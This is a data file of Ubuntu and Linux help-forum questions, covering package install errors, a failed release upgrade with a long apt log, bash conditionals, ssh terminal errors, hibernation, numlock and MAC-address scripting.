267303	otrs gives an `` sub-process /usr/bin/dpkg returned an error code ( 1 ) ''	i installed otrs like so : sudo apt-get install otrs and in the end it gave me this error below . setting otrs2 ( 3.1.7 + dfsg1-5 ) ... dbconfig-common : writing config to / etc/dbconfig-common/otrs2.conf replacing config file / etc / otrs / database.pm with new version already perl module enabled already rewrite module enabled * reloading web server config apache2 : could not reliably determining the server 's fully qualified domain name , using 127.0.1.1 for servername [ ok ] dbi connect ( 'database = otrs , host = localhost , port = 3306 ; ' , 'otrs ' , ... ) failed : access denied for user '' @ 'localhost ' to database 'otrs ' at / usr / share / otrs / kernel / system / db.pm line 256 error : otrs-otrs.rebuildconfig.pl-10 perl : 5.14.2 os : linux time : wed march 13 2013 12:01:17 message : access denied for user '' @ 'localhost ' to database 'otrs' traceback ( 7612 ) : module : kernel : : system : : db : : new ( v1.144.2.1 ) line : 227 module : . / bin / otrs.rebuildconfig.pl ( v1.14 ) line : 55 got no dbobject ! at / usr / share / otrs / kernel / system / sysconfig.pm line 103. dpkg : error processing otrs2 ( - configure ) : subprocess installed post-installation script returned error exit status 255 back errors were encountered while processing : otrs2 e : sub-process / usr / bin / dpkg returned an error code ( 1 ) i have a dutch ubuntu the error above i copy/paste it in google translater
267305	limiting physical memory of specifc process	performing research , i am interested in limitting the physical memory per specific process . my requirements : limit physical memory consumption for specific program in case of crossing limitation - do n't kill the process ! - just perform page-in - page-out . i used many unix options , w\o success . ulimit - sets the limit , but kill processes which cross them . the cgroup approach has shown me the same behavior . any ideas ? thanks yonatan
267308	how can i download a part of movie ( example : from 1:31:00 to 01:45:00 )	how can i download a part of movie ( example : from 1:31:00 to 01:45:00 ) ? it is mkv file ! thanks a lot !
267317	if i repair my windows xp installation , will it damage the dual-boot setup i have with ubuntu ?	i 'm running windows xp sp2 alongside ubuntu 12.04 ( for legacy compatibility ) , but after some failed windows updates i think my only option is to perform a windows repair . if i do that , will ( or could ) it damage the dual-boot ubuntu setup ? i just want to prepare myself ( and my wife ! ) for a couple of lengthy nights re-installation if that 's the case ... cheers
267318	adding skype chat in thunderbird	i would like to set up skype on my thunderbird software . however i do not see any way to add skype . this would be really useful and interesting , particularly for professional purposes . i know it is possible to use third programs or websites to access skype ( like imo.im ) so i assume there is a way doing it on thunderbird . please note that i already contacted skype support , and they forwarded me to thunderbird support ( if necessary , i can provide the logs here ) . furthermore i tried to contact thunderbird support but i did n't received answers , explaining why i am asking here . thank you all in advance for your help .
267320	updating ubuntu 10.04 on openvz	i am attempting to update a vps that is running ubuntu 10.04 on openvz . i have read many posts on this site and others that state this is possible to do . however , every time i attempt to perform do-release-upgrade i get the following error : calculating the changes could not calculate the upgrade an unresolvable problem occurred while calculating the upgrade : e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . this can be caused by : * upgrading to a pre-release version of ubuntu * running the current pre-release version of ubuntu * unofficial software packages not provided by ubuntu after reading similar posts i have taken steps including using ppa-purge to purge custom repositories , attempting to removexserver-xorg-video-nouveau ( which was not installed ) , attempting to re-install packages showing up as `` broken , '' and performing apt-get clean apt-get update , apt-get upgrade , and apt-get dist-upgrade ( all with no errors ) before attempting do-release-upgrade with no success . what needs to be fixed seems to differ on a case-be-case basis , so my dist-upgrade/apt.log follows : log time : 2013-03-12 20:32:08.068173 log time : 2013-03-12 20:32:11.037419 log time : 2013-03-12 20:34:02.843454 installing libssl1.0.0 as depends of vsftpd installing multiarch-support as predepends of libssl1.0.0 ignore old unsatisfied important dependency on logrotate : i386 installing libtinfo5 as depends of libedit2 new important dependency : krb5-locales : i386 installing krb5-locales as recommends of libkrb5-3 installing gcc-4.6-base as depends of libstdc++6 installing libdb5.1 as depends of iproute installing python2.7 as depends of python-pexpect installing python2.7-minimal as depends of python2.7 installing libpam-modules-bin as predepends of libpam-modules installing libjpeg8 as depends of libwmf0.2-7 installing libjpeg-turbo8 as depends of libjpeg8 ignore old unsatisfied important dependency on dbus : i386 installing libgmp10 as depends of g++-4.4 installing libmpfr4 as depends of g++-4.4 installing libmysqlclient18 as depends of libdbd-mysql-perl installing libpciaccess0 as depends of libdrm-intel1 installing libboost-iostreams1.46.1 as depends of aptitude installing libept1.4.12 as depends of aptitude installing libxapian22 as depends of aptitude new important dependency : apt-xapian-index : i386 installing apt-xapian-index as recommends of aptitude installing python-xapian as depends of apt-xapian-index installing python-debian as depends of apt-xapian-index installing python-chardet as depends of python-debian installing python-apt-common as depends of python-apt new important dependency : xz-lzma : i386 installing xz-lzma as recommends of python-apt installing libnspr4 as depends of libnspr4-0d installing libnl-3-200 as depends of quota installing libnl-genl-3-200 as depends of quota installing libxcb-shm0 as depends of libcairo2 ignore old unsatisfied important dependency on bash-completion : i386 installing libp11-kit0 as depends of libgnutls26 installing g++-4.6 as depends of g++ installing gcc-4.6 as depends of g++-4.6 installing cpp-4.6 as depends of gcc-4.6 installing libmpc2 as depends of cpp-4.6 installing libquadmath0 as depends of gcc-4.6 installing libstdc++6-4.6-dev as depends of g++-4.6 installing librtmp0 as depends of libcurl3-gnutls installing upstart as depends of udev installing ubuntu-keyring as depends of apt installing libpython2.7 as depends of gdb libept0 : i386 depends on libapt-pkg-libc6.10-6-4.8 [ i386 ] < none > ( none ) ca n't be satisfied ! ignore old unsatisfied important dependency on bsdmainutils : i386 new important dependency : icedtea-6-jre-jamvm : i386 installing icedtea-6-jre-jamvm as recommends of openjdk-6-jre-headless new important dependency : libssl-doc : i386 installing libssl-doc as recommends of libssl-dev installing mysql-server-5.5 as depends of mysql-server installing mysql-client-5.5 as depends of mysql-server-5.5 installing mysql-client-core-5.5 as depends of mysql-client-5.5 installing mysql-server-core-5.5 as depends of mysql-server-5.5 installing upstart as depends of mysql-server-5.5 installing libcommons-collections3-java as depends of libcommons-dbcp-java new important dependency : ecryptfs-utils : i386 installing ecryptfs-utils as recommends of adduser installing libecryptfs0 as depends of ecryptfs-utils installing libnss3 as depends of libecryptfs0 installing gettext-base as depends of ecryptfs-utils installing keyutils as depends of ecryptfs-utils installing cryptsetup as recommends of ecryptfs-utils installing dmsetup as depends of cryptsetup installing libdevmapper1.02.1 as depends of dmsetup installing cryptsetup-bin as depends of cryptsetup installing libcryptsetup4 as depends of cryptsetup-bin installing lsof as recommends of ecryptfs-utils installing libdpkg-perl as depends of dpkg-dev new important dependency : libalgorithm-merge-perl : i386 installing libalgorithm-merge-perl as recommends of dpkg-dev installing libalgorithm-diff-perl as depends of libalgorithm-merge-perl installing libalgorithm-diff-xs-perl as recommends of libalgorithm-diff-perl installing libswitch-perl as depends of perl-modules installing libclass-isa-perl as depends of perl-modules installing liblzma5 as depends of xz-utils installing keyboard-configuration as depends of console-setup installing libgssapi3-heimdal as depends of libldap-2.4-2 installing libasn1-8-heimdal as depends of libgssapi3-heimdal installing libroken18-heimdal as depends of libasn1-8-heimdal installing libhcrypto4-heimdal as depends of libgssapi3-heimdal installing libheimntlm0-heimdal as depends of libgssapi3-heimdal installing libkrb5-26-heimdal as depends of libheimntlm0-heimdal installing libheimbase1-heimdal as depends of libkrb5-26-heimdal installing libhx509-5-heimdal as depends of libkrb5-26-heimdal installing libwind0-heimdal as depends of libhx509-5-heimdal ignore old unsatisfied important dependency on uuid-runtime : i386 installing libffi6 as depends of libglib2.0-0 ignore old unsatisfied important dependency on libglib2.0-data : i386 installing libgs9 as depends of ghostscript installing libijs-0.35 as depends of libgs9 installing libjbig2dec0 as depends of libgs9 installing liblcms2-2 as depends of libgs9 installing gs-cjk-resource as depends of libgs9 installing cmap-adobe-japan1 as recommends of gs-cjk-resource installing libgs9-common as depends of libgs9 installing libmagickcore4 as depends of php5-imagick installing liblqr-1-0 as depends of libmagickcore4 installing imagemagick-common as depends of libmagickcore4 installing libmagickwand4 as depends of php5-imagick new important dependency : libmagickcore4-extra : i386 installing libmagickcore4-extra as recommends of imagemagick installing libgraph4 as depends of libmagickcore4-extra installing libcdt4 as depends of libgraph4 installing libgvc5 as depends of libmagickcore4-extra installing libpathplan4 as depends of libgvc5 installing librsvg2-2 as depends of libmagickcore4-extra installing libcroco3 as depends of librsvg2-2 installing libgdk-pixbuf2.0-0 as depends of librsvg2-2 installing libgdk-pixbuf2.0-common as depends of libgdk-pixbuf2.0-0 new important dependency : netpbm : i386 installing netpbm as recommends of imagemagick installing libnetpbm10 as depends of netpbm installing libmount1 as predepends of mount new important dependency : ssh-import-id : i386 installing ssh-import-id as recommends of openssh-server installing mountall as depends of initscripts installing libnfnetlink0 as depends of iptables installing libdrm-nouveau1a as depends of plymouth ignore old unsatisfied important dependency on plymouth-theme-ubuntu-text : i386 libdigest-sha1-perl : i386 depends on perlapi-5.10.1 [ i386 ] < none > ( none ) ca n't be satisfied ! installing liblockfile-bin as depends of liblockfile1 ignore old unsatisfied important dependency on bash-completion : i386 ignore old unsatisfied important dependency on bsdmainutils : i386 starting starting 2 investigating ( 0 ) initscripts [ i386 ] < 2.87dsf-4ubuntu17.5 - > 2.88dsf-13.10ubuntu11.1 > ( admin ) broken initscripts : i386 depends on mountall [ i386 ] < 2.15.3 - > 2.36.4 > ( admin ) ( > = 2.28 ) considering mountall : i386 10025 as a solution to initscripts : i386 33 holding back initscripts : i386 rather than change mountall : i386 investigating ( 0 ) udev [ i386 ] < 151-12.3 - > 175-0ubuntu9.2 > ( admin ) broken udev : i386 depends on upstart [ i386 ] < 0.6.5-8 - > 1.5-0ubuntu7.2 > ( admin ) ( > = 1.4-0ubuntu6 ) considering upstart : i386 10027 as a solution to udev : i386 32 holding back udev : i386 rather than change upstart : i386 investigating ( 0 ) ifupdown [ i386 ] < 0.6.8ubuntu29.2 - > 0.7~beta2ubuntu8 > ( admin ) broken ifupdown : i386 depends on initscripts [ i386 ] < 2.87dsf-4ubuntu17.5 - > 2.88dsf-13.10ubuntu11.1 > ( admin ) ( > = 2.88dsf-13.3 ) considering initscripts : i386 33 as a solution to ifupdown : i386 20 holding back ifupdown : i386 rather than change initscripts : i386 investigating ( 0 ) mysql-common [ i386 ] < 5.1.67-0ubuntu0.10.04.1 - > 5.5.29-0ubuntu0.12.04.2 > ( database ) broken mysql-common : i386 breaks on mysql-client-5.1 [ i386 ] < 5.1.67-0ubuntu0.10.04.1 > ( database ) considering mysql-client-5.1 : i386 1 as a solution to mysql-common : i386 11 added mysql-client-5.1 : i386 to the remove list broken mysql-common : i386 breaks on mysql-client-core-5.1 [ i386 ] < 5.1.67-0ubuntu0.10.04.1 > ( database ) considering mysql-client-core-5.1 : i386 0 as a solution to mysql-common : i386 11 added mysql-client-core-5.1 : i386 to the remove list broken mysql-common : i386 breaks on mysql-server-5.1 [ i386 ] < 5.1.67-0ubuntu0.10.04.1 > ( database ) considering mysql-server-5.1 : i386 -1 as a solution to mysql-common : i386 11 added mysql-server-5.1 : i386 to the remove list broken mysql-common : i386 breaks on mysql-server-core-5.1 [ i386 ] < 5.1.67-0ubuntu0.10.04.1 > ( database ) considering mysql-server-core-5.1 : i386 1 as a solution to mysql-common : i386 11 added mysql-server-core-5.1 : i386 to the remove list fixing mysql-common : i386 via remove of mysql-client-5.1 : i386 fixing mysql-common : i386 via remove of mysql-client-core-5.1 : i386 fixing mysql-common : i386 via remove of mysql-server-5.1 : i386 fixing mysql-common : i386 via remove of mysql-server-core-5.1 : i386 investigating ( 0 ) console-setup [ i386 ] < 1.34ubuntu15 - > 1.70ubuntu5 > ( utils ) broken console-setup : i386 conflicts on console-terminus [ i386 ] < 4.30-2 > ( fonts ) considering console-terminus : i386 -1 as a solution to console-setup : i386 11 added console-terminus : i386 to the remove list fixing console-setup : i386 via remove of console-terminus : i386 investigating ( 0 ) plymouth [ i386 ] < 0.8.2-2ubuntu2.2 - > 0.8.2-2ubuntu31 > ( x11 ) broken plymouth : i386 depends on udev [ i386 ] < 151-12.3 - > 175-0ubuntu9.2 > ( admin ) ( > = 166-0ubuntu4 ) considering udev : i386 32 as a solution to plymouth : i386 11 removing plymouth : i386 rather than change udev : i386 investigating ( 0 ) xz-lzma [ i386 ] < none - > 5.1.1alpha+20110809-3 > ( utils ) broken xz-lzma : i386 conflicts on lzma [ i386 ] < 4.43-14ubuntu2 - > 9.22-2ubuntu1 > ( utils ) considering lzma : i386 0 as a solution to xz-lzma : i386 9 added lzma : i386 to the remove list conflicts//breaks against version 4.43-14ubuntu2 for lzma but that is not instver , ignoring fixing xz-lzma : i386 via remove of lzma : i386 investigating ( 0 ) libdrm-nouveau1a [ i386 ] < none - > 2.4.39-0ubuntu0.1 > ( libs ) broken libdrm-nouveau1a : i386 conflicts on libdrm-nouveau1 [ i386 ] < 2.4.18-1ubuntu3 > ( libs ) considering libdrm-nouveau1 : i386 -1 as a solution to libdrm-nouveau1a : i386 8 added libdrm-nouveau1 : i386 to the remove list fixing libdrm-nouveau1a : i386 via remove of libdrm-nouveau1 : i386 investigating ( 0 ) libept0 [ i386 ] < 0.5.30 > ( libs ) broken libept0 : i386 depends on libapt-pkg-libc6.10-6-4.8 [ i386 ] < none > ( none ) considering apt : i386 18 as a solution to libept0 : i386 3 removing libept0 : i386 rather than change libapt-pkg-libc6.10-6-4.8 : i386 investigating ( 0 ) libcdt4 [ i386 ] < none - > 2.26.3-10ubuntu1 > ( libs ) broken libcdt4 : i386 conflicts on libgraphviz4 [ i386 ] < 2.20.2-8ubuntu3 > ( libs ) considering libgraphviz4 : i386 1 as a solution to libcdt4 : i386 2 added libgraphviz4 : i386 to the remove list fixing libcdt4 : i386 via remove of libgraphviz4 : i386 investigating ( 0 ) mysql-server-5.5 [ i386 ] < none - > 5.5.29-0ubuntu0.12.04.2 > ( database ) broken mysql-server-5.5 : i386 depends on upstart [ i386 ] < 0.6.5-8 - > 1.5-0ubuntu7.2 > ( admin ) ( > = 0.6.7-2 ) considering upstart : i386 10027 as a solution to mysql-server-5.5 : i386 0 holding back mysql-server-5.5 : i386 rather than change upstart : i386 investigating ( 0 ) cryptsetup [ i386 ] < none - > 2:1.4.1-2ubuntu4 > ( admin ) broken cryptsetup : i386 depends on plymouth [ i386 ] < 0.8.2-2ubuntu2.2 - > 0.8.2-2ubuntu31 > ( x11 ) considering plymouth : i386 11 as a solution to cryptsetup : i386 0 holding back cryptsetup : i386 rather than change plymouth : i386 investigating ( 0 ) mysql-server [ i386 ] < 5.1.67-0ubuntu0.10.04.1 - > 5.5.29-0ubuntu0.12.04.2 > ( database ) broken mysql-server : i386 depends on mysql-server-5.5 [ i386 ] < none - > 5.5.29-0ubuntu0.12.04.2 > ( database ) considering mysql-server-5.5 : i386 0 as a solution to mysql-server : i386 0 removing mysql-server : i386 rather than change mysql-server-5.5 : i386 investigating ( 0 ) libmagickcore2-extra [ i386 ] < 7:6.5.7.8-1ubuntu1.3 > ( libs ) broken libmagickcore2-extra : i386 depends on libgraphviz4 [ i386 ] < 2.20.2-8ubuntu3 > ( libs ) ( > = 2.20.0 ) considering libgraphviz4 : i386 1 as a solution to libmagickcore2-extra : i386 -1 removing libmagickcore2-extra : i386 rather than change libgraphviz4 : i386 investigating ( 0 ) libdigest-sha1-perl [ i386 ] < 2.12-1build1 > ( perl ) broken libdigest-sha1-perl : i386 depends on perlapi-5.10.1 [ i386 ] < none > ( none ) considering perl-base : i386 5211 as a solution to libdigest-sha1-perl : i386 -1 removing libdigest-sha1-perl : i386 rather than change perlapi-5.10.1 : i386 investigating ( 1 ) mountall [ i386 ] < 2.15.3 - > 2.36.4 > ( admin ) broken mountall : i386 depends on plymouth [ i386 ] < 0.8.2-2ubuntu2.2 - > 0.8.2-2ubuntu31 > ( x11 ) considering plymouth : i386 11 as a solution to mountall : i386 10025 added plymouth : i386 to the remove list fixing mountall : i386 via keep of plymouth : i386 investigating ( 1 ) base-files [ i386 ] < 5.0.0ubuntu20.10.04.5 - > 6.5ubuntu6.5 > ( admin ) broken base-files : i386 breaks on initscripts [ i386 ] < 2.87dsf-4ubuntu17.5 - > 2.88dsf-13.10ubuntu11.1 > ( admin ) ( < 2.88dsf-13.3 ) considering initscripts : i386 33 as a solution to base-files : i386 5214 upgrading initscripts : i386 due to breaks field in base-files : i386 investigating ( 1 ) initscripts [ i386 ] < 2.87dsf-4ubuntu17.5 - > 2.88dsf-13.10ubuntu11.1 > ( admin ) broken initscripts : i386 depends on mountall [ i386 ] < 2.15.3 - > 2.36.4 > ( admin ) ( > = 2.28 ) considering mountall : i386 10025 as a solution to initscripts : i386 33 holding back initscripts : i386 rather than change mountall : i386 try to re-instate ( 1 ) udev : i386 try to re-instate ( 1 ) ifupdown : i386 try to re-instate ( 1 ) plymouth : i386 investigating ( 1 ) plymouth [ i386 ] < 0.8.2-2ubuntu2.2 - > 0.8.2-2ubuntu31 > ( x11 ) broken plymouth : i386 depends on libdrm-nouveau1 [ i386 ] < 2.4.18-1ubuntu3 > ( libs ) ( > = 2.4.11-1ubuntu1~ ) considering libdrm-nouveau1 : i386 -1 as a solution to plymouth : i386 11 added libdrm-nouveau1 : i386 to the remove list broken plymouth : i386 depends on libplymouth2 [ i386 ] < 0.8.2-2ubuntu2.2 - > 0.8.2-2ubuntu31 > ( libs ) ( = 0.8.2-2ubuntu2.2 ) considering libplymouth2 : i386 16 as a solution to plymouth : i386 11 removing plymouth : i386 rather than change libplymouth2 : i386 investigating ( 2 ) mountall [ i386 ] < 2.15.3 - > 2.36.4 > ( admin ) broken mountall : i386 depends on plymouth [ i386 ] < 0.8.2-2ubuntu2.2 - > 0.8.2-2ubuntu31 > ( x11 ) considering plymouth : i386 11 as a solution to mountall : i386 10025 added plymouth : i386 to the remove list fixing mountall : i386 via keep of plymouth : i386 investigating ( 2 ) base-files [ i386 ] < 5.0.0ubuntu20.10.04.5 - > 6.5ubuntu6.5 > ( admin ) broken base-files : i386 breaks on initscripts [ i386 ] < 2.87dsf-4ubuntu17.5 - > 2.88dsf-13.10ubuntu11.1 > ( admin ) ( < 2.88dsf-13.3 ) considering initscripts : i386 33 as a solution to base-files : i386 5214 upgrading initscripts : i386 due to breaks field in base-files : i386 investigating ( 2 ) initscripts [ i386 ] < 2.87dsf-4ubuntu17.5 - > 2.88dsf-13.10ubuntu11.1 > ( admin ) broken initscripts : i386 depends on mountall [ i386 ] < 2.15.3 - > 2.36.4 > ( admin ) ( > = 2.28 ) considering mountall : i386 10025 as a solution to initscripts : i386 33 holding back initscripts : i386 rather than change mountall : i386 investigating ( 2 ) plymouth [ i386 ] < 0.8.2-2ubuntu2.2 - > 0.8.2-2ubuntu31 > ( x11 ) broken plymouth : i386 depends on libdrm-nouveau1 [ i386 ] < 2.4.18-1ubuntu3 > ( libs ) ( > = 2.4.11-1ubuntu1~ ) considering libdrm-nouveau1 : i386 -1 as a solution to plymouth : i386 10025 added libdrm-nouveau1 : i386 to the remove list broken plymouth : i386 depends on libplymouth2 [ i386 ] < 0.8.2-2ubuntu2.2 - > 0.8.2-2ubuntu31 > ( libs ) ( = 0.8.2-2ubuntu2.2 ) considering libplymouth2 : i386 16 as a solution to plymouth : i386 10025 added libplymouth2 : i386 to the remove list fixing plymouth : i386 via keep of libdrm-nouveau1 : i386 fixing plymouth : i386 via keep of libplymouth2 : i386 investigating ( 2 ) libdrm-nouveau1a [ i386 ] < none - > 2.4.39-0ubuntu0.1 > ( libs ) broken libdrm-nouveau1a : i386 conflicts on libdrm-nouveau1 [ i386 ] < 2.4.18-1ubuntu3 > ( libs ) considering libdrm-nouveau1 : i386 10025 as a solution to libdrm-nouveau1a : i386 8 holding back libdrm-nouveau1a : i386 rather than change libdrm-nouveau1 : i386 investigating ( 2 ) libpango1.0-0 [ i386 ] < 1.28.0-0ubuntu2.2 - > 1.30.0-0ubuntu3.1 > ( libs ) broken libpango1.0-0 : i386 breaks on plymouth [ i386 ] < 0.8.2-2ubuntu2.2 - > 0.8.2-2ubuntu31 > ( x11 ) ( < 0.8.2-2ubuntu19 ) considering plymouth : i386 10025 as a solution to libpango1.0-0 : i386 5 holding back libpango1.0-0 : i386 rather than change plymouth : i386 investigating ( 3 ) base-files [ i386 ] < 5.0.0ubuntu20.10.04.5 - > 6.5ubuntu6.5 > ( admin ) broken base-files : i386 breaks on initscripts [ i386 ] < 2.87dsf-4ubuntu17.5 - > 2.88dsf-13.10ubuntu11.1 > ( admin ) ( < 2.88dsf-13.3 ) considering initscripts : i386 33 as a solution to base-files : i386 5214 upgrading initscripts : i386 due to breaks field in base-files : i386 investigating ( 3 ) initscripts [ i386 ] < 2.87dsf-4ubuntu17.5 - > 2.88dsf-13.10ubuntu11.1 > ( admin ) broken initscripts : i386 depends on mountall [ i386 ] < 2.15.3 - > 2.36.4 > ( admin ) ( > = 2.28 ) considering mountall : i386 10025 as a solution to initscripts : i386 33 holding back initscripts : i386 rather than change mountall : i386 try to re-instate ( 3 ) libplymouth2 : i386 try to re-instate ( 3 ) libpango1.0-0 : i386 investigating ( 4 ) base-files [ i386 ] < 5.0.0ubuntu20.10.04.5 - > 6.5ubuntu6.5 > ( admin ) broken base-files : i386 breaks on initscripts [ i386 ] < 2.87dsf-4ubuntu17.5 - > 2.88dsf-13.10ubuntu11.1 > ( admin ) ( < 2.88dsf-13.3 ) considering initscripts : i386 33 as a solution to base-files : i386 5214 upgrading initscripts : i386 due to breaks field in base-files : i386 investigating ( 4 ) initscripts [ i386 ] < 2.87dsf-4ubuntu17.5 - > 2.88dsf-13.10ubuntu11.1 > ( admin ) broken initscripts : i386 depends on mountall [ i386 ] < 2.15.3 - > 2.36.4 > ( admin ) ( > = 2.28 ) considering mountall : i386 10025 as a solution to initscripts : i386 33 holding back initscripts : i386 rather than change mountall : i386 investigating ( 5 ) base-files [ i386 ] < 5.0.0ubuntu20.10.04.5 - > 6.5ubuntu6.5 > ( admin ) broken base-files : i386 breaks on initscripts [ i386 ] < 2.87dsf-4ubuntu17.5 - > 2.88dsf-13.10ubuntu11.1 > ( admin ) ( < 2.88dsf-13.3 ) considering initscripts : i386 33 as a solution to base-files : i386 5214 upgrading initscripts : i386 due to breaks field in base-files : i386 investigating ( 5 ) initscripts [ i386 ] < 2.87dsf-4ubuntu17.5 - > 2.88dsf-13.10ubuntu11.1 > ( admin ) broken initscripts : i386 depends on mountall [ i386 ] < 2.15.3 - > 2.36.4 > ( admin ) ( > = 2.28 ) considering mountall : i386 10025 as a solution to initscripts : i386 33 holding back initscripts : i386 rather than change mountall : i386 investigating ( 6 ) base-files [ i386 ] < 5.0.0ubuntu20.10.04.5 - > 6.5ubuntu6.5 > ( admin ) broken base-files : i386 breaks on initscripts [ i386 ] < 2.87dsf-4ubuntu17.5 - > 2.88dsf-13.10ubuntu11.1 > ( admin ) ( < 2.88dsf-13.3 ) considering initscripts : i386 33 as a solution to base-files : i386 5214 upgrading initscripts : i386 due to breaks field in base-files : i386 investigating ( 6 ) initscripts [ i386 ] < 2.87dsf-4ubuntu17.5 - > 2.88dsf-13.10ubuntu11.1 > ( admin ) broken initscripts : i386 depends on mountall [ i386 ] < 2.15.3 - > 2.36.4 > ( admin ) ( > = 2.28 ) considering mountall : i386 10025 as a solution to initscripts : i386 33 holding back initscripts : i386 rather than change mountall : i386 investigating ( 7 ) base-files [ i386 ] < 5.0.0ubuntu20.10.04.5 - > 6.5ubuntu6.5 > ( admin ) broken base-files : i386 breaks on initscripts [ i386 ] < 2.87dsf-4ubuntu17.5 - > 2.88dsf-13.10ubuntu11.1 > ( admin ) ( < 2.88dsf-13.3 ) considering initscripts : i386 33 as a solution to base-files : i386 5214 upgrading initscripts : i386 due to breaks field in base-files : i386 investigating ( 7 ) initscripts [ i386 ] < 2.87dsf-4ubuntu17.5 - > 2.88dsf-13.10ubuntu11.1 > ( admin ) broken initscripts : i386 depends on mountall [ i386 ] < 2.15.3 - > 2.36.4 > ( admin ) ( > = 2.28 ) considering mountall : i386 10025 as a solution to initscripts : i386 33 holding back initscripts : i386 rather than change mountall : i386 investigating ( 8 ) base-files [ i386 ] < 5.0.0ubuntu20.10.04.5 - > 6.5ubuntu6.5 > ( admin ) broken base-files : i386 breaks on initscripts [ i386 ] < 2.87dsf-4ubuntu17.5 - > 2.88dsf-13.10ubuntu11.1 > ( admin ) ( < 2.88dsf-13.3 ) considering initscripts : i386 33 as a solution to base-files : i386 5214 upgrading initscripts : i386 due to breaks field in base-files : i386 investigating ( 8 ) initscripts [ i386 ] < 2.87dsf-4ubuntu17.5 - > 2.88dsf-13.10ubuntu11.1 > ( admin ) broken initscripts : i386 depends on mountall [ i386 ] < 2.15.3 - > 2.36.4 > ( admin ) ( > = 2.28 ) considering mountall : i386 10025 as a solution to initscripts : i386 33 holding back initscripts : i386 rather than change mountall : i386 investigating ( 9 ) base-files [ i386 ] < 5.0.0ubuntu20.10.04.5 - > 6.5ubuntu6.5 > ( admin ) broken base-files : i386 breaks on initscripts [ i386 ] < 2.87dsf-4ubuntu17.5 - > 2.88dsf-13.10ubuntu11.1 > ( admin ) ( < 2.88dsf-13.3 ) considering initscripts : i386 33 as a solution to base-files : i386 5214 upgrading initscripts : i386 due to breaks field in base-files : i386 investigating ( 9 ) initscripts [ i386 ] < 2.87dsf-4ubuntu17.5 - > 2.88dsf-13.10ubuntu11.1 > ( admin ) broken initscripts : i386 depends on mountall [ i386 ] < 2.15.3 - > 2.36.4 > ( admin ) ( > = 2.28 ) considering mountall : i386 10025 as a solution to initscripts : i386 33 holding back initscripts : i386 rather than change mountall : i386 done error : root : dist-upgrade failed : 'e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . ' log time : 2013-03-12 20:34:06.008729 i would greatly appreciate any help .
267326	why does `` if [ 0 ] '' execute the `` then '' statement in bash script ?	this guide says : an if/then construct tests whether the exit status of a list of commands is 0 if i execute 0 in the bash , it says : 0 : command not found so its exit status is not 0 , and [ 0 ] should return a non-zero value exit status too . but it returns 0 exit status actually , and if [ 0 ] executes the then statement , not the else statement . can anyone explain it ? actually i am a chinese student , so forgive my poor english please . thank you !
267327	time in gtalk and facebook chat is wrong	i messed with some time zone settings while installing redis yesterday following this tutorial : http : //www.codingsteps.com/install-redis-2-6-on-ubuntu/ ( at least i think this is when the problem started ) . right now the clock in ubuntu shows the right time , but when i use gtalk or facebook to chat , wrong timestaps are added , the time shown is 8:09am instead of 1:09pm . i 'm on central european time , i use firefox browser . any ideas ?
267329	starting remote script/terminal based programs through ssh gives error ( error opening terminal : unknown . )	i directly start a remote script/command on an ubuntu server with the following command : ssh me @ server 'nano my_file.txt' however , this throws an error : error opening terminal : unknown . another example , calling a remote script which contains the nano command from above gives the same error . ssh me @ server 'open_nano.sh' when i do ssh me @ server 'echo something ' , i get something as expected . what is wrong ?
267335	ubuntu tuxonice and uswsusp does n't work	i have ubuntu 12.04.2 installed on dell inspiron 1545 , i 've upgraded my kernell to 3.8.2 as well due to read only problems i was having with 3.5.0-25 . but now i ca n't get my hibernate to work . i 've tried tuxonice and uswsusp . uswsusp - seems to hibernate ok but on resume get stuck . tuxonice - again seems to hibernate ok , all i get is flashing cursor and black screen then powers off . when i resume it seems to boot as if i 've restarted the laptop , it does n't bring up any previously opened programs and it seems to put my filesystem into read only state as well . can you please help me get this fixed .
267338	wlan and macchanger	i was wondering about how to write a script for changing my default mac address before enabling networking . it happens often , that the mac address changes to default . i would like to show the mac address in conky ( or any other graphical desktop interface ) . this script should also change the mac address automatically if for any reason the default was restored . thank you for help .
267342	ubuntu 12.04 , numlock not working	i have a installation of ubuntu 12.04 , my num lock is disabled every time at boot , so i have to turn it on manually each time for the log in screen `` password '' i tried these lines : sudo apt-get update sudo apt-get -y install numlockx sudo sed -i 's|^exit 0 . * $ | # numlock enable\n [ -x /usr/bin/numlockx ] \ & \ & numlockx on\n\nexit 0| ' /etc/rc.local and i edited in the file : /etc/kbd/config , uncommenting lines : turn on numlock by default leds=+num and also : miscellaneous compatibility options , enable default numeric keys . nothing works : ( i have windows 7 on the same machine , and num lock is okay , i guess it is not a bios problem ! ! any help please ? thanks in advance
267344	how can i update a tar.gz file ?	i have created a tar.gz file ( using the gui , not the command line ) . how can i update it with a command that new files are added and modified files are updated , too ?
267349	updaing kernel while having xorg driver installed	on my system i 've installed ubuntu 12.04 with kernel 3.7.8-030708-generic and xorg graphics driver . now i want to upgrade my kernel to 3.8.2 . so will it effect my xorg driver . if does , then what steps should i take to keep running my xorg driver as well as update my kernel ? thanks in advance
267350	istallation asus q200ebhi3t45 error	i am have a bit of trouble installing ubuntu on this laptop . during the installation everything seem fine and when it cam up to the dual boot screen windows and ubuntu both show up . however , when i selected ubuntu it pop up with an window error and will not launch . it actually ask me for a windows recover disk . i think it is in the boot setting but i am not sure what i need to change to get it to boot any ideas ?
267353	qtchoose does n't run due to `` '/usr/lib/x86_64-linux-gnu/qt5/bin/qtchooser ' : no such file or directory '' error	when i try to start qtchooser i get this notification : qtchooser : could not exec '/usr/lib/x86_64-linux-gnu/qt5/bin/qtchooser ' : no such file or directory i 've installed qt5 from ppa : canonical-qt5-edgers/qt5-beta-proper i hope you can help me .
267355	11.10 file extension	what file extensions does ubuntu 11.10 use ? i am trying to install google chrome . in google chrome site there are two types of files available for ubuntu `` .deb '' and `` .rpm '' i downloaded both , but neither one works ...
267360	resize the window control buttons ( close , restore , maximize )	how can i change the size of the close/restore/maximize/minimize buttons of the windows ? they are too small for me . with a big monitor , it 's difficult to position the mouse over them . is there a setting or theme or something in mint or ubuntu ? i 'd really like the buttons to be at least 48 pixels wide . currently they are ~20 pixels .
